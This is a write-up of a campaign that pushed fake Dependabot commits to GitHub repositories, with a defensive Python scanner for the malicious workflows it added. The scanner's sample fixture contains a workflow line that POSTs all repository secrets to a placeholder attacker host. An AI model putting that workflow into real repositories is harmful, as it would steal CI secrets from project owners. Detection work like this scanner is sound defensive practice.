In July, a security anomaly surfaced when atypical commits, disguised as Dependabot contributions, were detected in numerous GitHub repositories. On closer examination, these commits were found to harbor malicious code, raising serious concerns within the developer community.
Diving into Details
- Threat actors fabricated commit messages that mimicked Dependabot's automated contributions in order to mask their malicious activity.
- The disguise was effective because most developers trust Dependabot's commits without scrutiny. The attackers used compromised victim GitHub accounts to push these malicious commits.
- The injected code was designed to exfiltrate the project's GitHub secrets to an attacker-controlled C2 server. In addition, the JavaScript files in the targeted projects were modified to embed password-stealing malware, a direct threat to end users.
Modus Operandi
- Between July 8 and July 11, an unidentified threat actor compromised a large number of GitHub repositories, affecting both the public and private sectors, with a significant share of the victims located in Indonesia.
- The attackers forged commit messages so that the contributions appeared to come from the real Dependabot.
- Examining the affected repositories more closely revealed consistent patterns.
- A new GitHub Actions workflow file named “hook.yml” appeared repeatedly. On every push event it sent the repository's GitHub secrets to a specific malicious URL. In addition, every existing “*.js” file in the project had an obfuscated line appended to it.
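One way a defender can triage workflow files for the hook.yml pattern described above, as an example added here rather than code from the original write-up: a small Python scanner that flags a workflow which runs on push, reads the secrets context and contacts a host outside an allow-list. The two sample workflows, the placeholder host and the allow-list are constructed for this example.

```python
import re
from urllib.parse import urlparse

# Hosts a workflow may legitimately contact; anything else receiving the secrets
# context deserves a look. This allow-list is an assumption; extend it for your org.
ALLOWED_HOSTS = {"github.com", "api.github.com"}

# ${{ secrets.NAME }} or ${{ toJSON(secrets) }} (the whole secrets context at once)
SECRETS_CTX = re.compile(r"\$\{\{\s*(?:toJSON\(\s*secrets\s*\)|secrets\.\w+)\s*\}\}")
URL_RE = re.compile(r"https?://[^\s'\"`)\]]+")
# 'on: push', 'on: [push, ...]', or a 'push:' / '- push' entry under a block-form on:
PUSH_TRIGGER = re.compile(
    r"^on:(?:[^\n]*\bpush\b|[ \t]*\n(?:[ \t]+[^\n]*\n)*?[ \t]+-?[ \t]*push\b)", re.M)

def scan_workflow(text):
    """Flag a workflow that runs on push, reads the secrets context and contacts
    a host outside the allow-list: the combination described for hook.yml."""
    secret_refs = SECRETS_CTX.findall(text)
    external = sorted({u for u in URL_RE.findall(text)
                       if urlparse(u).hostname not in ALLOWED_HOSTS})
    on_push = bool(PUSH_TRIGGER.search(text))
    return {"on_push": on_push, "secret_refs": len(secret_refs), "external_urls": external,
            "suspicious": on_push and bool(secret_refs) and bool(external)}

# Constructed sample resembling the described behaviour; it is not the campaign's
# actual hook.yml and the destination host is a placeholder.
EXFIL_WORKFLOW = """\
on:
  push:
jobs:
  run:
    steps:
      - run: curl -X POST -d '${{ toJSON(secrets) }}' https://attacker.example/collect
"""

# Constructed benign workflow: uses a secret on push but talks only to GitHub.
CI_WORKFLOW = """\
on: [push, pull_request]
jobs:
  test:
    steps:
      - uses: actions/checkout@v4
      - run: npm test
        env: { NPM_TOKEN: "${{ secrets.NPM_TOKEN }}" }
"""

if __name__ == "__main__":
    for name, body in (("hook.yml", EXFIL_WORKFLOW), ("ci.yml", CI_WORKFLOW)):
        print(name, scan_workflow(body))
```

Run it over every file under `.github/workflows/` in a repository; a hit on all three conditions is a triage lead, not proof, since legitimate deploy workflows also post secrets to non-GitHub hosts.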
Conclusion
Given the severity of the breach, several affected victims were contacted; what they reported showed that the unauthorized access had been carried out with compromised personal access tokens. This campaign is a stern reminder of the risks involved even when sourcing code from trusted platforms like GitHub. To reduce exposure, move to GitHub's fine-grained personal access tokens, review commit changes regularly, and enable 2FA.